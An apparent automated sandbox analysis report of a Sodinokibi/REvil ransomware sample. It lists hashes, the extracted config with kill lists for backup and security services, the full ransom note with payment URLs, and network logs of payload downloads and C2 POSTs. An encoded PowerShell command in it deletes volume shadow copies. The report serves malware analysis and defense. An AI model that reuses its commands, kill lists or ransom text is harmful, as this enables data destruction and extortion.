Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    130s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/07/2024, 01:42 UTC

General

  • Target

    LisectAVT_2403002C_119.exe

  • Size

    139KB

  • MD5

    72d9db37db04e51f61fc7b3424a009d2

  • SHA1

    3be50ec5fced0b0f0e9f1795ecbafc7538f28426

  • SHA256

    ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae

  • SHA512

    be13842d7b615579714ac1dab4f43e11207075a4a3d09ec2aae2c87727ccdde2dece33c2394b20e0e669cd03f8c8f42924bf8d6cdaf1ab9489d9b555fb1a4281

  • SSDEEP

    1536:+DvcP3aXhpshwVs5OE8yNcYQpG2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOx9VG8:5lSVhaNcYMkgnBR5uiV1UvQFOxXGCH

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\57b425897y-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 57b425897y. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F1F16BFE2AA39390 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F1F16BFE2AA39390 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: POR0f3QiQr2UoM3hRxEy097z3fu4J/iDZ+0rP9FWSPrpC5Dyb8HaCuZiimX7XMNc wUhBswVKT/akxhjGwsDpNxtNkNgP9KflpVbf4Ca5eSfJBm5Fa8EIXrYAtviIOj5A 36VK1xBaY3uxDPkJOwMbDMo9JI+Bx6mpM2Q16R6+CDKw4dRkhs6hpLmCy8SqPdQ5 9f6y7BcpFFosLTtMzPvh7f8cvu5xct1qRMy2t7F7iZt1DEgA5YEDoSoJrXJEDQjz WgefX/86b2k1DEbuIHZHq+AzViPgr8xda6/dB/2r9PCCkJCsmMVYaOD/2PjMfMZj pN3K/6Hz2BJ2SgY5McFaXhdC/p3Z+4lgE4+yQHSVLrXsdFlqTLLgpRyN4mnBqlc9 phVQ6eGjwXeKl/ph8+BYAZ7DwTG+PTm+8IyOaR5OY0b3OOXNr2jRu3BQxl6VYe5a yp8DtF2p1VDN7myMX4r/XZtPB8njI/n6FdJVqLH88zsne5ki8dwVzND33buU9vZE 90uWdMfpTS1Zgzg+FJL1w5mBfgM++pfHoO7WUNeUlzkgZFvTmPOOSvMS4pBh1gmu YZFZ2mieYXLbKQKuIpAaxxEZ7tX93dLMtAcdTBaL1kVB/UWmGHCT7GQT+3NvxwpH io9N3yP0taA5V3q4fANkgjPrBgFs6SJOawMxG9tjuhXkzaeMBzoWUWsOZz2YWlF2 btTUnt3ExfEwKBUnx3gnOfVZkel3JEoudUV6drF70n+jN4bHMCdeY7nI61ylgSY1 738fBTDKncAVqGiVQaspW3uf2JqIQuqks01rdvWvo9i1IfkNkhNq6b4aygjJnHzy in8K6dAOKC4adT4Lilp77kYqb5p6Hylee90YZQTHrJoXAjDkeq0dSvHIr+mFx1xM dIVMTRYCCLMa0ZFCDpWJDfZvwWbgDQHKwe3qHv1ByBjL4LVQK9LBFptV41/Zb1Lb M9Jd+J5DFegofAikpy/ru+8A16ljZm81KHMnLQoHiv2LvP38rY0t5HjC+8aKT2MT u1bgz7tyQX4/xFlPdWuHjOqH9gYVSPTXCnUMAWU/2jIVz/UtDAE4TSRaiF2EJE1h L1Vvyr292EKMic/0WmAlQcqIs/nvMO4IMp7f11b2sezRk1OjYQ8uN1LtVz9gVKM2 zrCqUhq7uXPbpHo40Ew+gbcP8EUM9Qxt+qxApWGHO4NmnCGsrt/mN8extPRh4hvg ROkwWCBAeHRbX1Gtv3L946vOJxpwjYGvnZw2KSEZ8fdS6+A77inO8b5nZOCxBvgf sFCAu6SVZqEFCRVfdf9NioCjnal7rMJo+rlriIdFEFYIhiXPfCkMwIWh/QjyllyL T3pG0kTM8zo9FTq3EqhVUjMYi06ubdxF9hL7kXcgXqtZWl8dKH/W+w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F1F16BFE2AA39390

http://decryptor.cc/F1F16BFE2AA39390

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_119.exe
    "C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_119.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\21b416d7.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2696
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2820

    Network

    • flag-us
      DNS
      ddos.dnsnb8.net
      Kufmxd.exe
      Remote address:
      8.8.8.8:53
      Request
      ddos.dnsnb8.net
      IN A
      Response
      ddos.dnsnb8.net
      IN A
      44.221.84.105
    • flag-us
      GET
      http://ddos.dnsnb8.net:799/cj//k1.rar
      Kufmxd.exe
      Remote address:
      44.221.84.105:799
      Request
      GET /cj//k1.rar HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: ddos.dnsnb8.net:799
      Connection: Keep-Alive
    • flag-us
      GET
      http://ddos.dnsnb8.net:799/cj//k2.rar
      Kufmxd.exe
      Remote address:
      44.221.84.105:799
      Request
      GET /cj//k2.rar HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: ddos.dnsnb8.net:799
      Connection: Keep-Alive
    • flag-us
      GET
      http://ddos.dnsnb8.net:799/cj//k3.rar
      Kufmxd.exe
      Remote address:
      44.221.84.105:799
      Request
      GET /cj//k3.rar HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: ddos.dnsnb8.net:799
      Connection: Keep-Alive
    • flag-us
      GET
      http://ddos.dnsnb8.net:799/cj//k4.rar
      Kufmxd.exe
      Remote address:
      44.221.84.105:799
      Request
      GET /cj//k4.rar HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: ddos.dnsnb8.net:799
      Connection: Keep-Alive
    • flag-us
      GET
      http://ddos.dnsnb8.net:799/cj//k5.rar
      Kufmxd.exe
      Remote address:
      44.221.84.105:799
      Request
      GET /cj//k5.rar HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: ddos.dnsnb8.net:799
      Connection: Keep-Alive
    • flag-us
      DNS
      sandd.nl
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      sandd.nl
      IN A
      Response
      sandd.nl
      IN A
      2.17.209.149
      sandd.nl
      IN A
      2.17.209.133
    • flag-us
      DNS
      digivod.de
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      digivod.de
      IN A
      Response
      digivod.de
      IN A
      159.69.118.212
    • flag-us
      DNS
      southeasternacademyofprosthodontics.org
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      southeasternacademyofprosthodontics.org
      IN A
      Response
    • flag-us
      DNS
      resortmtn.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      resortmtn.com
      IN A
      Response
      resortmtn.com
      IN A
      15.197.142.173
      resortmtn.com
      IN A
      3.33.152.147
    • flag-us
      DNS
      mdk-mediadesign.de
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      mdk-mediadesign.de
      IN A
      Response
      mdk-mediadesign.de
      IN A
      5.175.14.247
    • flag-us
      DNS
      tetinfo.in
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      tetinfo.in
      IN A
      Response
      tetinfo.in
      IN A
      104.21.45.69
      tetinfo.in
      IN A
      172.67.211.14
    • flag-us
      POST
      https://tetinfo.in/wp-content/temp/qdwldcrrro.jpg
      LisectAVT_2403002C_119.exe
      Remote address:
      104.21.45.69:443
      Request
      POST /wp-content/temp/qdwldcrrro.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 1048
      Host: tetinfo.in
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 25 Jul 2024 01:43:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      location: https://www.tetinfo.in
      alt-svc: h3=":443"; ma=86400
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HfjNtz48SYkKc83JsDPRQh9RgVOwhQQL9eJkuuaLrsCRhwx1wuIuA0flvWLv51T%2B3lGFVOvBf%2BXejzaMv7CMEA9IkSl73keN%2FZgPXj7PJf58EqgulJSfObbiIXBs"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8a88762f3a4394bd-LHR
    • flag-us
      DNS
      www.tetinfo.in
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      www.tetinfo.in
      IN A
      Response
      www.tetinfo.in
      IN A
      172.67.211.14
      www.tetinfo.in
      IN A
      104.21.45.69
    • flag-us
      GET
      https://www.tetinfo.in/
      LisectAVT_2403002C_119.exe
      Remote address:
      172.67.211.14:443
      Request
      GET / HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.tetinfo.in
      Response
      HTTP/1.1 200 OK
      Date: Thu, 25 Jul 2024 01:43:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      last-modified: Thu, 08 Jun 2023 09:38:35 GMT
      vary: Accept-Encoding
      alt-svc: h3=":443"; ma=86400
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHxbsRbk3QAZLif2ulwCS8iFvNcRO4UXJ8%2FgABT9PLuZl8ofdd68xaORpAOb5pNUKDWE5kTdMYQXWG6ubVyWUhGid76J5nZsiyKnGiikFjo49%2FfyNCfY0BsB0l0K9ggX5g%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8a8876356e8d9589-LHR
    • flag-us
      DNS
      fayrecreations.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      fayrecreations.com
      IN A
      Response
      fayrecreations.com
      IN A
      198.54.121.233
    • flag-us
      DNS
      ecpmedia.vn
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      ecpmedia.vn
      IN A
      Response
      ecpmedia.vn
      IN A
      103.221.223.112
    • flag-us
      DNS
      physiofischer.de
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      physiofischer.de
      IN A
      Response
      physiofischer.de
      IN A
      178.254.32.102
    • flag-us
      DNS
      highlinesouthasc.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      highlinesouthasc.com
      IN A
      Response
      highlinesouthasc.com
      IN A
      172.67.162.61
      highlinesouthasc.com
      IN A
      104.21.81.149
    • flag-us
      POST
      https://highlinesouthasc.com/wp-content/temp/ovkqmk.jpg
      LisectAVT_2403002C_119.exe
      Remote address:
      172.67.162.61:443
      Request
      POST /wp-content/temp/ovkqmk.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 1048
      Host: highlinesouthasc.com
      Response
      HTTP/1.1 403 Forbidden
      Date: Thu, 25 Jul 2024 01:44:24 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Cache-Control: no-cache, private
      Set-Cookie: october_session=eyJpdiI6IlRZb1luUEFlcFdiKys3VXNHdGpUNHc9PSIsInZhbHVlIjoiVkVKZTZEMVp3RkpzMVdnbkJ1QzEzbXpTZFIwXC83MHlDdkZsSzE2YXBJQmNZaGk1dm1uYU5SMzRud2wybm55eFIiLCJtYWMiOiI0Mzg1ZDkxNzc0NGYwOTcwOWVhYWRkMzAwNDhmYWMyYjk0ZTFkZTc4NWY3MTBhZjRhYWIzNTg4Yjk5MDMxN2I4In0%3D; expires=Thu, 25-Jul-2024 03:44:24 GMT; Max-Age=7200; path=/; httponly
      X-Powered-By: PHP/7.4.16
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8V6NTol8eUc4QGzBjd%2FazBOscoTzpO5SwABp0Q95N%2FMC9bPc45knXSAFDoGFYXdXXP%2BUXWlYHgdEirCJBatBgTGlmZDidzxEQm4AGVaglWoV0SrOerE%2FSZId98xBoCEOGlMMKAOYg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8a8876edab427737-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      antenanavi.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      antenanavi.com
      IN A
      Response
    • flag-us
      DNS
      blog.solutionsarchitect.guru
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      blog.solutionsarchitect.guru
      IN A
      Response
    • flag-us
      DNS
      deepsouthclothingcompany.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      deepsouthclothingcompany.com
      IN A
      Response
    • flag-us
      DNS
      deepsouthclothingcompany.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      deepsouthclothingcompany.com
      IN A
    • flag-us
      DNS
      coursio.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      coursio.com
      IN A
      Response
      coursio.com
      IN A
      64.227.72.13
    • flag-us
      DNS
      quickyfunds.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      quickyfunds.com
      IN A
      Response
    • flag-us
      DNS
      atmos-show.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      atmos-show.com
      IN A
      Response
      atmos-show.com
      IN A
      46.8.8.100
    • flag-us
      DNS
      apps.identrust.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.identrust.com
      IN A
      Response
      apps.identrust.com
      IN CNAME
      identrust.edgesuite.net
      identrust.edgesuite.net
      IN CNAME
      a1952.dscq.akamai.net
      a1952.dscq.akamai.net
      IN A
      2.18.190.80
      a1952.dscq.akamai.net
      IN A
      2.18.190.81
    • flag-gb
      GET
      http://apps.identrust.com/roots/dstrootcax3.p7c
      LisectAVT_2403002C_119.exe
      Remote address:
      2.18.190.80:80
      Request
      GET /roots/dstrootcax3.p7c HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: apps.identrust.com
      Response
      HTTP/1.1 200 OK
      X-XSS-Protection: 1; mode=block
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-Robots-Tag: noindex
      Referrer-Policy: same-origin
      Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
      ETag: "37d-5f433188daa00"
      Accept-Ranges: bytes
      Content-Length: 893
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      Content-Type: application/pkcs7-mime
      Cache-Control: max-age=3600
      Expires: Thu, 25 Jul 2024 02:44:39 GMT
      Date: Thu, 25 Jul 2024 01:44:39 GMT
      Connection: keep-alive
    • flag-us
      DNS
      pawsuppetlovers.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      pawsuppetlovers.com
      IN A
      Response
    • flag-us
      DNS
      hokagestore.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      hokagestore.com
      IN A
      Response
      hokagestore.com
      IN A
      209.58.148.145
    • flag-us
      DNS
      midmohandyman.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      midmohandyman.com
      IN A
      Response
      midmohandyman.com
      IN A
      3.33.251.168
      midmohandyman.com
      IN A
      15.197.225.128
    • flag-us
      DNS
      mmgdouai.fr
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      mmgdouai.fr
      IN A
      Response
    • flag-us
      DNS
      stingraybeach.com
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      stingraybeach.com
      IN A
      Response
      stingraybeach.com
      IN A
      209.17.116.163
    • flag-us
      DNS
      tandartspraktijkhartjegroningen.nl
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      tandartspraktijkhartjegroningen.nl
      IN A
      Response
      tandartspraktijkhartjegroningen.nl
      IN A
      185.78.250.157
    • flag-us
      DNS
      leoben.at
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      leoben.at
      IN A
      Response
      leoben.at
      IN A
      94.247.147.150
    • flag-at
      POST
      https://leoben.at/include/image/nqrumsgk.jpg
      LisectAVT_2403002C_119.exe
      Remote address:
      94.247.147.150:443
      Request
      POST /include/image/nqrumsgk.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 1048
      Host: leoben.at
      Response
      HTTP/1.1 200 OK
      Cache-Control: no-cache
      Connection: close
      Content-Type: text/html; charset=utf-8
      Pragma: no-cache
      Content-Length: 247
      Set-Cookie: TSda85fe30027=085e248197ab2000abf586496b74e705ef26bba1c20e4ea3d9edd0b2429ff02ab1d181ab67db6d550829d3a413113000470f6d4508dce8637c31a464e59f59599fc640e7789ca699ec5adfb48774b74c1d73ab4e97314213e1715fb0a3d3a629; Path=/
    • flag-us
      DNS
      licor43.de
      LisectAVT_2403002C_119.exe
      Remote address:
      8.8.8.8:53
      Request
      licor43.de
      IN A
      Response
      licor43.de
      IN A
      185.66.41.198
    • 44.221.84.105:799
      http://ddos.dnsnb8.net:799/cj//k1.rar
      http
      Kufmxd.exe
      558 B
      256 B
      5
      6

      HTTP Request

      GET http://ddos.dnsnb8.net:799/cj//k1.rar
    • 44.221.84.105:799
      http://ddos.dnsnb8.net:799/cj//k2.rar
      http
      Kufmxd.exe
      558 B
      216 B
      5
      5

      HTTP Request

      GET http://ddos.dnsnb8.net:799/cj//k2.rar
    • 44.221.84.105:799
      http://ddos.dnsnb8.net:799/cj//k3.rar
      http
      Kufmxd.exe
      558 B
      216 B
      5
      5

      HTTP Request

      GET http://ddos.dnsnb8.net:799/cj//k3.rar
    • 44.221.84.105:799
      http://ddos.dnsnb8.net:799/cj//k4.rar
      http
      Kufmxd.exe
      558 B
      216 B
      5
      5

      HTTP Request

      GET http://ddos.dnsnb8.net:799/cj//k4.rar
    • 44.221.84.105:799
      http://ddos.dnsnb8.net:799/cj//k5.rar
      http
      Kufmxd.exe
      558 B
      216 B
      5
      5

      HTTP Request

      GET http://ddos.dnsnb8.net:799/cj//k5.rar
    • 2.17.209.149:443
      sandd.nl
      tls
      LisectAVT_2403002C_119.exe
      342 B
      219 B
      5
      5
    • 2.17.209.149:443
      sandd.nl
      tls
      LisectAVT_2403002C_119.exe
      386 B
      219 B
      6
      5
    • 159.69.118.212:443
      digivod.de
      tls
      LisectAVT_2403002C_119.exe
      344 B
      219 B
      5
      5
    • 159.69.118.212:443
      digivod.de
      tls
      LisectAVT_2403002C_119.exe
      288 B
      219 B
      5
      5
    • 15.197.142.173:443
      resortmtn.com
      LisectAVT_2403002C_119.exe
      152 B
      3
    • 3.33.152.147:443
      resortmtn.com
      LisectAVT_2403002C_119.exe
      152 B
      3
    • 5.175.14.247:443
      mdk-mediadesign.de
      LisectAVT_2403002C_119.exe
      152 B
      3
    • 104.21.45.69:443
      https://tetinfo.in/wp-content/temp/qdwldcrrro.jpg
      tls, http
      LisectAVT_2403002C_119.exe
      2.3kB
      4.1kB
      12
      12

      HTTP Request

      POST https://tetinfo.in/wp-content/temp/qdwldcrrro.jpg

      HTTP Response

      301
    • 172.67.211.14:443
      https://www.tetinfo.in/
      tls, http
      LisectAVT_2403002C_119.exe
      2.2kB
      46.3kB
      30
      44

      HTTP Request

      GET https://www.tetinfo.in/

      HTTP Response

      200
    • 198.54.121.233:443
      fayrecreations.com
      tls
      LisectAVT_2403002C_119.exe
      404 B
      179 B
      6
      4
    • 198.54.121.233:443
      fayrecreations.com
      tls
      LisectAVT_2403002C_119.exe
      288 B
      179 B
      5
      4
    • 103.221.223.112:443
      ecpmedia.vn
      tls
      LisectAVT_2403002C_119.exe
      483 B
      219 B
      8
      5
    • 103.221.223.112:443
      ecpmedia.vn
      tls
      LisectAVT_2403002C_119.exe
      288 B
      219 B
      5
      5
    • 178.254.32.102:443
      physiofischer.de
      LisectAVT_2403002C_119.exe
      152 B
      3
    • 172.67.162.61:443
      https://highlinesouthasc.com/wp-content/temp/ovkqmk.jpg
      tls, http
      LisectAVT_2403002C_119.exe
      2.2kB
      6.4kB
      11
      12

      HTTP Request

      POST https://highlinesouthasc.com/wp-content/temp/ovkqmk.jpg

      HTTP Response

      403
    • 64.227.72.13:443
      coursio.com
      tls
      LisectAVT_2403002C_119.exe
      345 B
      219 B
      5
      5
    • 64.227.72.13:443
      coursio.com
      tls
      LisectAVT_2403002C_119.exe
      288 B
      219 B
